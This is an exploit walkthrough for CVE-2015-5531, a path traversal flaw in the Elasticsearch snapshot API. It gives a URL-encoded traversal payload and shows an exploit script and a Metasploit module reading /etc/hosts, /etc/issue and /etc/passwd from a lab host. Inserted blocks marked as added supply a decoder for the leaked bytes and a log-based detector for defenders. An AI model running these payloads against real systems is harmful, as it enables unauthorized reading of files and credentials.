Script for the ElasticSearch URL path traversal vulnerability, CVE-2015-5531
[crg@fogheaven elasticpwn]$ python CVE-2015-5531.py exploitlab.int /etc/hosts
!dSR script for CVE-2015-5531
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
The script requires path.repo to be set in elasticsearch.yml and the directory to be writable by the elasticsearch process.
In order to bypass the snapshot- prefix set on the server side, we need to create a known relative path:
curl http://exploitlab.int:9200/_snapshot/?pretty
{
  "pwn" : {
    "type" : "fs",
    "settings" : {
      "location" : "dsr"
    }
  },
  "pwnie" : {
    "type" : "fs",
    "settings" : {
      "location" : "dsr/snapshot-ev1l"
    }
  }
}
We will use it later to access files through the path traversal URL:
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
The file content is returned as an array of ints, which needs to be translated into human-readable text:
crg@exploitlab:~$ python elk-5531.py localhost /etc/issue
!dSR script for CVE-2015-5531
{u'status': 400, u'error': u'ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10]]'}
[85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10] = Ubuntu 12.04.5 LTS \n \l
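The byte array above is just the file's bytes written out as decimal integers inside the parse exception. The following decoder is an added example, not part of the original script or page; it is written from the responder's side, for reconstructing from a captured response what a server actually disclosed. It assumes the exception text has exactly the shape shown above; the sample string, the helper names and the JSON-body wrapper are constructed here.

```python
import re
from typing import Optional

# Constructed sample: the error body shape shown on this page, carrying the
# same integer array (which decodes to "Ubuntu 12.04.5 LTS \n \l" plus two newlines).
SAMPLE_ERROR = (
    "ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): "
    "[85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, "
    "92, 110, 32, 92, 108, 10, 10]]"
)

# Matches the "offset=N, length=N" metadata and the bracketed integer list.
_XCONTENT_RE = re.compile(
    r"Failed to derive xcontent from \(offset=(\d+), length=(\d+)\): \[([^\]]*)\]"
)


def decode_xcontent_error(message: str) -> Optional[str]:
    """Recover the text that Elasticsearch echoed back as a decimal byte array.

    Each integer is one byte of the buffer the server tried to parse. Returns
    None when the message carries no such array, when a value is not a byte,
    or when the element count disagrees with the declared length.
    """
    m = _XCONTENT_RE.search(message)
    if m is None:
        return None
    length = int(m.group(2))
    raw = m.group(3).strip()
    values = [int(v) for v in raw.split(",")] if raw else []
    if len(values) != length or any(not 0 <= v <= 255 for v in values):
        return None
    # The file is arbitrary bytes; decode as UTF-8 but keep going on bad sequences.
    return bytes(values).decode("utf-8", errors="replace")


def decode_response(resp: dict) -> Optional[str]:
    """Same, starting from the parsed JSON body ({'status': 400, 'error': '...'})."""
    error = resp.get("error")
    if resp.get("status") != 400 or not isinstance(error, str):
        return None
    return decode_xcontent_error(error)


if __name__ == "__main__":
    print(decode_response({"status": 400, "error": SAMPLE_ERROR}))
```

Note that the disclosure rides on an HTTP 400: the "error" response is the one that carries the file, so status codes alone are not a useful signal of whether anything was exposed.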
There is also a path disclosure that could help exploitation in some scenarios:
crg@exploitlab:~$ python elk-5531.py localhost /etc/passwda
!dSR script for CVE-2015-5531
{"error":"SnapshotMissingException[[pwn:dsr/../../../../../../../../etc/passwda] is missing]; nested: FileNotFoundException[/var/tmp/dsr/snapshot-dsr/../../../../../../../../etc/passwda (No such file or directory)]; ","status":404}
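From the defender's side, the request shape used above (a snapshot API call whose snapshot name carries URL-encoded parent-directory hops) stands out in web-server or reverse-proxy access logs in front of port 9200. The checker below is an added example and is not part of the original script or page. The log lines are constructed in combined log format (hosts, timestamps and sizes are made up); the double-decoding step is a design choice here, not something the page describes, added so that a `%252f` variant does not slip past a single decode.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines modelled on the requests described above.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Oct/2015:13:14:41 +0000] "GET /_snapshot/?pretty HTTP/1.1" 200 312',
    '10.0.0.5 - - [13/Oct/2015:13:14:42 +0000] "PUT /_snapshot/pwn HTTP/1.1" 200 21',
    '10.0.0.5 - - [13/Oct/2015:13:14:43 +0000] "GET /_snapshot/pwn/ev1l%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 512',
    '10.0.0.9 - - [13/Oct/2015:13:15:01 +0000] "GET /my-index/_search?q=user:kimchy HTTP/1.1" 200 1024',
    '10.0.0.5 - - [13/Oct/2015:13:15:10 +0000] "GET /_snapshot/pwn/ev1l%252f..%252f..%252fetc%252fissue HTTP/1.1" 404 201',
]

# Minimal combined-log parser: source, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." path segment on its own (not e.g. "..foo"), after decoding.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')


def normalize_path(raw: str) -> str:
    """Percent-decode repeatedly (bounded) so %2f and %252f both become '/'."""
    path = raw
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_snapshot_traversal(path: str) -> bool:
    """True when a snapshot API request path contains a parent-directory hop."""
    normalized = normalize_path(path.split("?", 1)[0])
    return normalized.startswith("/_snapshot/") and bool(TRAVERSAL_RE.search(normalized))


def find_traversal_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per log line that looks like a snapshot traversal attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line we understand; skip silently
        if is_snapshot_traversal(m.group("path")):
            hits.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "path": normalize_path(m.group("path")),
            })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOGS):
        print(f'{hit["ts"]} {hit["src"]} {hit["status"]} {hit["path"]}')
```

Both a 400 and a 404 are flagged on purpose: as the two responses above show, the 400 is the one that echoes file bytes and the 404 leaks the resolved on-disk path, so neither status means the request failed from the attacker's point of view. Alerting on the path shape, and keeping 9200 off untrusted networks, is the practical mitigation until the server is patched.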
msf > use auxiliary/scanner/http/elasticsearch_traversal
msf auxiliary(elasticsearch_traversal) > show options
Module options (auxiliary/scanner/http/elasticsearch_traversal):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DEPTH     7                yes       Traversal depth
FILEPATH  /etc/passwd      yes       The path to the file to read
Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                     yes       The target address range or CIDR identifier
RPORT     9200             yes       The target port
THREADS   1                yes       The number of concurrent threads
VHOST                      no        HTTP server virtual host
msf auxiliary(elasticsearch_traversal) > info
Name: ElasticSearch Snapshot API Directory Traversal
Module: auxiliary/scanner/http/elasticsearch_traversal
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Benjamin Smith
Pedro Andujar <[email protected]>
Jose A. Guasch <[email protected]>
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DEPTH     7                yes       Traversal depth
FILEPATH  /etc/passwd      yes       The path to the file to read
Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                     yes       The target address range or CIDR identifier
RPORT     9200             yes       The target port
THREADS   1                yes       The number of concurrent threads
VHOST                      no        HTTP server virtual host
Description:
'This module exploits a directory traversal vulnerability in
ElasticSearch, allowing an attacker to read arbitrary files with JVM
process privileges, through the Snapshot API. '
References:
http://cvedetails.com/cve/2015-5531/
https://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html
msf auxiliary(elasticsearch_traversal) > set RHOSTS **********
RHOSTS => **********
msf auxiliary(elasticsearch_traversal) > run
[*] **********:9200 - Checking if it's a vulnerable ElasticSearch
[+] **********:9200 - Check successful
[*] **********:9200 - Retrieving file contents...
[+] **********:9200 - File saved in: /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(elasticsearch_traversal) > cat /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt
[*] exec: cat /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
elasticsearch:x:107:113::/home/elasticsearch:/bin/false
msf auxiliary(elasticsearch_traversal) >